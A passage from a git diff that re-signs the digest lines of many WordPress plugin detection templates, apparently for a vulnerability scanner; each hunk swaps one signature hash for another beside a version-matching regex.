490a004630440220798c035f76031c2dd5f217ae48f93ac3ad8ea4752b2cd624cdfc65dd547bd929022068778210a7f5f71bfdad06876c36e79ecb41f0d2612927c39ec1d8af78424913:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml index ddae468ae0..96856d63f8 100644 --- a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4b0a0048304602210083fb43fd7ae5a751e62d9498f0045086cb6e7c32c90cc81a229180343781b23302210091d78d7639f70929fd643e374919471e772f2cf9d1bf8648a1b315128fc164eb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100e514d23f0cdbca43678cf1bb9134bb0ac24bf168e8fce0d00e0d1be78c37e93f022100f1ed05b116b3078568f2dea58b3de77b9dd70fe068f9e44843d1a6ed83d0497d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml b/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml index 97873633b3..047ddef4f1 100644 --- a/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a00463044022066cd71fcc6194f0a9875c8bf2c316ec86b363b1ebefc47792a6ff99a600db78d022031136c8e3827192f32c41240aa7186a59eefa909975fc2b3cc1e0af623c05b56:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100adefee8a6e1054e0ed7cfdeab14f5c0022b73aad549ff2202e278b5b37dcff6a0220411e1c31cc69d42b47504e29e7e5765ac12cf24e2abf341475b195215e9075ca:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-payments.yaml index 5b72a3d91e..48b25a288c 100644 --- a/http/technologies/wordpress/plugins/woocommerce-payments.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-payments.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022048b974f8041ec9fd77d0343f437e562f87c178c13bb1600a0845e837b6316199022100ff74591dc8c0cb38829d4b79574d0710a9a6604948782985685abb11656722be:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100ce35581a835e6799f5a7fd651769fded5cba2bd130dc57c0cd087fface478d02022059315b9681640a0cbc561072460280a552dc662bd0532fe455adfbf2f900bde7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml index 3710d144d2..2c2a9708b8 100644 --- a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022064b382abe6dcf5f89efbe4b26209011436c73f6882d087f011857a3e88c64cc9022100e5c175186f391745a77ca824ef4ddc0b5a388f5b2a5cc4f9b1b87251ad31b780:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100e77909593ec48ed8560fcb206f0cca301739b93376d82efb03101ac8dcbea3fd02205661124fcc1fdc22c3f9fbca6c89381507d5df0511976f7af27ad9e6879d4e01:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml index 067a6619ad..8402f54abd 100644 --- a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a0046304402206e8f6763aa02f424c869ee40229378d959ce28234bc787687801490f838ca5ca022039a5bde3060c3c8e20da011533b4037d4457c7ffb51849e5a0f0e5898eb06d63:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502201ac220995325f65cc023971ec3e3eb4bb4ce0284347177d0da08c27e593c4bbd0221009f015ef54e2cf26cfdbb78193b94b85593eca80143f2b406ff985b0097b6812d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-services.yaml b/http/technologies/wordpress/plugins/woocommerce-services.yaml index 5af9058c1c..52c533345f 100644 --- a/http/technologies/wordpress/plugins/woocommerce-services.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-services.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022100b0c5d229b969c09fac55cc757dc1d72c978b253d64705592fce01b2c2f37911f022014cae9924aa6a577667729f935475c872e75bb5c88f862ffdece43123d0c86d5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044021f3710c9cd6f9e16462235698650caf58fa1225dccd3cdf5f9b6c0f8f0c13d79022100facde8a2398dab898c85b9acd9396921047e9413afe1d9fd0104b17cd505204c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce.yaml b/http/technologies/wordpress/plugins/woocommerce.yaml index 8779e79e9a..f35986c557 100644 --- a/http/technologies/wordpress/plugins/woocommerce.yaml +++ b/http/technologies/wordpress/plugins/woocommerce.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4b0a00483046022100963547ad352627b481a0400ce82252e3d5c665692121df3e814742926ace71c3022100b94e46f4b029f145f4582ac44415639fc55847a8a571ec60ef8fae94a6a196fd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220669e39c9c4265f5c6f35f4efdbbd20520b405102e036e3e609b06443d69f81280220770cef80de901dc3356732761b96b5bb53f28381f860c56ba0465480245fcfa4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wordfence.yaml b/http/technologies/wordpress/plugins/wordfence.yaml index a12b238b40..3a78d83019 100644 --- a/http/technologies/wordpress/plugins/wordfence.yaml +++ b/http/technologies/wordpress/plugins/wordfence.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4b0a00483046022100da37405a89109d8442d1fb054964b423bd8142ff93e8635bccaeeb8f5d321cac022100b8ccc0b6ee4ca8a8b1d060a690824f8aceb18b1f39db51ba97a6dc5e92367e7c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100b451fc4e9c07f28e11996e75ecfdefd18f4a9003500d5d6ec7a7b229adf80483022100d39258c2bcd767ab3ab6634006c08540c772882eadd3bdeb8e909028f97ff9f2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wordpress-importer.yaml b/http/technologies/wordpress/plugins/wordpress-importer.yaml index d14e6cefa6..e5161d6877 100644 --- a/http/technologies/wordpress/plugins/wordpress-importer.yaml +++ b/http/technologies/wordpress/plugins/wordpress-importer.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a004730450220668f9779e4124668654d48d21566a0fbfdb5d4da9249e6aeb7c8437732635e6d022100bc7b3fcfcf07f559fdf6f32e5afd9676ae94fbf35223b8cfe89cc307beec50ff:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022011292388ec335f2d0a99ab4357097a9a2a0c5e368cc4c9492dbf4cdb76c28a7502203f28e6cbe65b848bb599b3f250578ae5ae80b9f99a0359d7ae6715d710717c88:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wordpress-seo.yaml b/http/technologies/wordpress/plugins/wordpress-seo.yaml index 6b21ecc49f..460c0ca8eb 100644 --- a/http/technologies/wordpress/plugins/wordpress-seo.yaml +++ b/http/technologies/wordpress/plugins/wordpress-seo.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4b0a00483046022100d0e7053bcddc2dce214fab012c796688eb0724a93afdb680f9f8299f9d3b6c14022100e3611edcb79b2834bcc67aee83a35da65914487e9388970b408efd0fbae0bc5d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022060a2bd41d8b75efa5ec156faa816c68525015ad673758f48dcb93b667daf351d022026fca6f7cfb4c0f28210ca8b02ccb88a8195acd934738e902c3cab63d43f1302:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/worker.yaml b/http/technologies/wordpress/plugins/worker.yaml index c5acabf328..b336f909e9 100644 --- a/http/technologies/wordpress/plugins/worker.yaml +++ b/http/technologies/wordpress/plugins/worker.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022100dd75fa27596d7c1e864eaee08ee5729326dcda2e7dd22852ac9eccd33e213060022051bdd0adf65a656d3083f2af3aca0aa5a9fe25dd0847f45992375ff004618f36:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022047570350cb482b32df1fd3b49c0715649a9ec9c61e72916e78d226b8de92d718022100cb85012cb11d8b18deb3f7fb79b203800ec55a76ed2cb05b62fad1da6c7241ab:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-crontrol.yaml b/http/technologies/wordpress/plugins/wp-crontrol.yaml index bb6370cba5..7d30514689 100644 --- a/http/technologies/wordpress/plugins/wp-crontrol.yaml +++ b/http/technologies/wordpress/plugins/wp-crontrol.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a00463044022073aa983e3b092ea3d30ff0e3d7f58622edadf1627c80d43a5528130a419839c102206f931019559a01199313aad4be00174c7791a14f4d3c87f1aa7dd6a2e7e13fea:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100eaf5145997bdd15325c89a08fad8c801184997c12c5f147e92d4fa81d91a79b302207b20d72455bb7b9140d0a18d0b1cb6efe936fb2f5ee26d319b5a411c89c703b6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml index 27a9cbeec1..cbe1f38a5a 100644 --- a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml +++ b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a004730450220706e75a1a9ccb867f25db173a0226e82793649c80cd735f699d19912f6048f0b022100cfbcd66900bcf7b591272d6c907a68843d6d3f0c3d66d87af287bbe3e449d8d5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220458ece5d67a185e113c343a6c933598a31aae607da26681cf8173e14d688a7eb02207378ce88c043c1e1672f958effc5c5130df665e7b6d7f0ace87d0b4ae3b08d74:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-file-manager.yaml b/http/technologies/wordpress/plugins/wp-file-manager.yaml index 23183ddafd..e03f1948fe 100644 --- a/http/technologies/wordpress/plugins/wp-file-manager.yaml +++ b/http/technologies/wordpress/plugins/wp-file-manager.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022076a648a9cb5c631a2edcc0ab433e2200564f85e02cac41803439b4b92edd4701022100ea61259770fe2064a0cb1e61615045a8c370548e540679deaf8f7b61dcaf965b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402202404cd8406a4facdd86fcf978bdf509a0ba37990f6aa16990256989a922ae9e4022001deee20b4d50ed839c085008ba5e09c0abbc6fec6a62dd0210a9a7ebf1df60c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-google-maps.yaml b/http/technologies/wordpress/plugins/wp-google-maps.yaml index a13e91002e..9f84ad79f9 100644 --- a/http/technologies/wordpress/plugins/wp-google-maps.yaml +++ b/http/technologies/wordpress/plugins/wp-google-maps.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a0046304402203abd57c2a27fc288e8b9085c254484f1653bcdf3d04666adb41166c2a8f19a7402203ac4dab0871c0021ccf0e1a617f7928b1e097306f0ffc51f837b8a2688864f6f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220063dafa11e3a491738f0027c4240ea8330587c7d88072f171766c29ec8cc910802205249bdc2a257e064a0253b74a2cd3d786da06ebe4a6621d4831cbcdfea928952:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-mail-logging.yaml b/http/technologies/wordpress/plugins/wp-mail-logging.yaml index fa6c5a88a7..71b63ac3bc 100644 --- a/http/technologies/wordpress/plugins/wp-mail-logging.yaml +++ b/http/technologies/wordpress/plugins/wp-mail-logging.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a00463044022070eb02cee00d235a0bb6e43c948f7de197c039410cfb7e1302c17fe66de1d0ad02207bba4d0174db2aca4e32da528d7760713cc64433c0bc740412b1925fc04cc437:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022072de347295c19c290e12459a790e780afb1716214a9e0360c462ecf26df5f54d022100e898a1500c19f2afb0d89d25cb9f6343b7d21dd3319592749e6ae886e5a4a636:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml index d662d82300..12a0301c0e 100644 --- a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml +++ b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a00463044022012cff16b4bc24430112542ced08287fb446808511c135d6c0f819f3ad2110d440220117bf5f67f2716666956ae5ba1ddbdfa30680d3a616084921e94bf3fba36ebbf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502201cafbad04373d68a9d9a9813f532bb2c1742ba0a656c2d6c7117ce2f029e5137022100ac22412db5ec11e4d3fc54ee282975e0d2060629c90e080065a22d6c70bbbaa3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml index b9ecbeff00..8980c8f18a 100644 --- a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml +++ b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a004730450221008a0e83ec2113630936b9a8f4601ab2786250229dbb0098c03c97fcd1b90aa64702202b670f410eef8f52993c3ba232bc2f707f1b919b690964660e97ba5454cf0fe8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100d90f2d456e2fff0a2c87817bdcd89ca8bfc0a157d93bc7882b33efea8e4f03ea022100f06d0a3d7b4433a36184e59cd7490be0f30fc15c64c66f6e82ef6d5a18414b7c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml index 852f8c6672..8b4b7be9d5 100644 --- a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml +++ b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a0046304402207056995c60b7c108ec835ffac93b273c4ce54ef0e410661ffb380f3800705f5002203380055890afcb96a8799189baffa8bf07de6028704e7779f48a6f3af3cafe1e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100d632b9483159629dbe984f649c819528c3d3d39f3343ac2104fcb01eaf938f74022076e0fd4eaac55ca4aa8655e628c74196546df2124cd0c9260ee1600e7815e5d5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-optimize.yaml b/http/technologies/wordpress/plugins/wp-optimize.yaml index fa65d09a31..e4eebaee2e 100644 --- a/http/technologies/wordpress/plugins/wp-optimize.yaml +++ b/http/technologies/wordpress/plugins/wp-optimize.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022100c5845f089d9aaf0075780ee696e54d17a2ca2463de2f82859f64011a7d7543d402207341bc53fcdb5b17271143b8db048b120f648667c46ce7f649bbd1a4396118e0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402202229a4508cf3135b6976b09c6670ceccc19332826dcc2ba4ad586ce76115d1c202201161f9977e36c0b652c9723bd29e82a4ca09634fe1a91155316baed8f75074c0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-pagenavi.yaml b/http/technologies/wordpress/plugins/wp-pagenavi.yaml index 0925f757c0..30d30fb164 100644 --- a/http/technologies/wordpress/plugins/wp-pagenavi.yaml +++ b/http/technologies/wordpress/plugins/wp-pagenavi.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a0046304402202564953aac079967a661da8afa835a306b8bb4c940684e9e1382d26f357f55b402201331f132bca4a1670bca8975c38755be711c5ee2af7f20f65ae6005b820597a3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100c597344c2fbfa7d11498771cd1f987fc6d73d57afb15189794f61e4fe640432d022100f9d6fdaab56c0ea93a9225e6f4b1042f1bc474783b05673503afb340861988e1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-reset.yaml b/http/technologies/wordpress/plugins/wp-reset.yaml index a55af23257..c3fe1c2366 100644 --- a/http/technologies/wordpress/plugins/wp-reset.yaml +++ b/http/technologies/wordpress/plugins/wp-reset.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a0047304502210099f75ae1ad384606272b4c7a06f61def098040a6f53a25e3041d57f5a9927f9102201f9fa4d1991dbe9c09478fdc3742251435bc324e9deb328e752824d762f69a40:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022017d8bf55b3b97b3ac96f4185d8a8fb07da139d5060a156c5dc6e5581e154baa102200d6e5a2ad9f84133bac590c1916661bbbc8223fc5491798e1aa8d4ec83969188:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml b/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml index 7722eb51a4..63a0a81461 100644 --- a/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml +++ b/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4b0a00483046022100cfdf3398d256a26dd7cd3d4c208a81fed95434c120b3ae60973a68a16793fa5b022100b5457602881a778e5769e4995c317c16d72e6b12e3315aeb0cef0b5562f54b09:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502207f35239edd307958c21b8f13a1728c2b075f5b2e440ffb8547c9ef4bae09b4af022100abbfa6a43212b4079ff31106cfc925f5cc4fe6743cb0d8ab3ef4724d0a007c9e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-rollback.yaml b/http/technologies/wordpress/plugins/wp-rollback.yaml index 8554ae4e6b..7101f6b1e1 100644 --- a/http/technologies/wordpress/plugins/wp-rollback.yaml +++ b/http/technologies/wordpress/plugins/wp-rollback.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a0046304402207fb29ad1ae63cecc12e5e7c0d3cbd2edb2628a3e4f21cf59ca5a70ce397d158002204ea8e40f0043ec43177c8cb7836bccf97e7ad734b484aac34163c6e525d79869:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022071d75ebb495a0038e42a5f45dea93278bfa46a2985eb20cf38c6bfe57de8d896022100fa4f2f0591b5b084f64ee86548987700afd4d321a337dac7ed80091b3da56553:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-seopress.yaml b/http/technologies/wordpress/plugins/wp-seopress.yaml index bdbd464f11..938b34d52d 100644 --- a/http/technologies/wordpress/plugins/wp-seopress.yaml +++ b/http/technologies/wordpress/plugins/wp-seopress.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022100fe57d7650b6a2003a8937097cc3f6c2249fe28c69ad17d2512c4f087e9baf2d80220761d07bbc6a053379916bb23e8113c73da9835c03de9a18cfbc44176ecbdd070:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100a6a45f62d2ece61b26d5a7a4d91661603f62b232d31fcb70e0e3d463cca0b3e0022004458794d8a14e2c0c1c5e5b2f80255a05f3e510b9e6a8692a19eab8eaa77956:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml index 78cd6e6da2..1836c6a90e 100644 --- a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml +++ b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022002b23f9ced01c9753547d5e0f874e2572261c562a9708d065ca3072885715006022100ead8e413cfa12839569d55908a9fbdad7391bab4290cccf9e4e2040c7b316c38:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100bc9458792ce86ec6f3efc95be3bf19840c3b9a330458e7a2a0ea48149c22e01c022046d225e0cdfad86213c035278322e476839cb3616a18c58751ada0892b175cd4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-smushit.yaml b/http/technologies/wordpress/plugins/wp-smushit.yaml index a69820c28e..e7a91057f7 100644 --- a/http/technologies/wordpress/plugins/wp-smushit.yaml +++ b/http/technologies/wordpress/plugins/wp-smushit.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022100b7624437b57727124f4538c8ec69e50e92fd6d91433f2e615bf9cab57b21fb6502203603cb002e2a96132d962ef246e3ac5dcb3f53b3e3036a342fa9c487e3c9009c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402205dcbc3776723a45b49dee13804d32fd7165f871d2508f28be3aad27246993ced022077d732c67ba97b6d3db0b900da2ea17f5fd00a2a6ff8b798c2f1bf5189fb4abc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-statistics.yaml b/http/technologies/wordpress/plugins/wp-statistics.yaml index de8979593b..3f80a423ff 100644 --- a/http/technologies/wordpress/plugins/wp-statistics.yaml +++ b/http/technologies/wordpress/plugins/wp-statistics.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a004730450221008901ae9f4f98617f359d5cb125b9bf97e002eccde2eec14d98c4a18e7b586fb502202b1ae8dcf038136e047c93739f3b6fd4a6adcd5ba4d5fc79fbb4f303d50305d9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502206a865b1fe7327fd9bda51530c6642781d6ba8efa0e3161288eb5a643f1eb451e022100aba203abaf718e8dd314350d7fc7c3f1b0ffcd02880039c28b57f016f2455b7d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-super-cache.yaml b/http/technologies/wordpress/plugins/wp-super-cache.yaml index 40881f2d6f..6fee4ffa0e 100644 --- a/http/technologies/wordpress/plugins/wp-super-cache.yaml +++ b/http/technologies/wordpress/plugins/wp-super-cache.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4b0a0048304602210083e152c6f93b48a6e2fc15b03c44ceee4c207e943b08bb3fccf86337f8695b29022100eb4caa086a6b63d6b2631100e370ff1b1f9ec93ed18717cf91ce05e21043461c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502206c9ded49a6fdfa0f339a4058819fba0e9c461890e52191384f7dd88f67d4c8d90221009b3b4815f19519fe05a2f7bd4cd4b871053a760e16f97d84b4892965da6bcf16:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml index 9e9b965044..514841ac9e 100644 --- a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml +++ b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4b0a00483046022100c11b1c308294e7d263a203d2bcde48e9ed8c242dba3d0111bbdbbd94d904258b022100de0067ff9c4c844b92677ad76ff5fb0f4f220fc01746c4b52b69d4c34151b4e2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100ab9e134e38fa9971dd3d877f5e9ea1bcdfc2f725d31ec2d44db62bf45f88feb802207d0484536598c0580da996769a468dd7ce041c170f4d1c551fcf3206155db412:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml index 07eb1f1b8d..c1711c1518 100644 --- a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml +++ b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a0046304402207547f349790f2851796f6945e68077dadd14a62c46cd18e05cdf7e64b57c2cff02203bddc283480f20859233368919f2cbccb32b953072595e6928f28d36523b3898:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100eaa680800cb2fea20ce6c8b609feee07fe313f6f6a37cc1ede502568a178cc6e0221009d686b6bc8721bf2288fc4f1bbf60562dc7656e9f59a50678b7dbb54dba4ad1a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpforms-lite.yaml b/http/technologies/wordpress/plugins/wpforms-lite.yaml index 5f226ec647..f1a9a9a4d4 100644 --- a/http/technologies/wordpress/plugins/wpforms-lite.yaml +++ b/http/technologies/wordpress/plugins/wpforms-lite.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a0047304502202ad2bb393b714b216dfa3bab996583cb074f75244c52b53328336f827edf8ff5022100985e4a4eb05d315cb17eee8aaae86d98a83230373963d67c2aacf7031c837a9c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402201b5946a3a890f63578bdee987a7159c9c2a50e7af021abbc708085087cea95dd02200859393b86c1c84a83784906c0e322c4e7f2a8562ba915e9077c141dc1380d9b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wps-hide-login.yaml b/http/technologies/wordpress/plugins/wps-hide-login.yaml index 67eeae8cf0..58f34428ca 100644 --- a/http/technologies/wordpress/plugins/wps-hide-login.yaml +++ b/http/technologies/wordpress/plugins/wps-hide-login.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a0046304402202d319433e55c2bb817029d3d51f397cf924f6abf73ba82f4d14062a8086b234d02207501f2ef07e292ecf060a3948439ef8c3a2e1d587a83101d5b101392d1ed2f19:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022015ed9aec2cac5d3e0c8e740cda9f0513f7e2a93b3728313970ab416c86e386d3022054449aa43dbfbcd7b03edccb39e7b5d2c3b852980766bf6d54a3b48b85fd8c9d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git 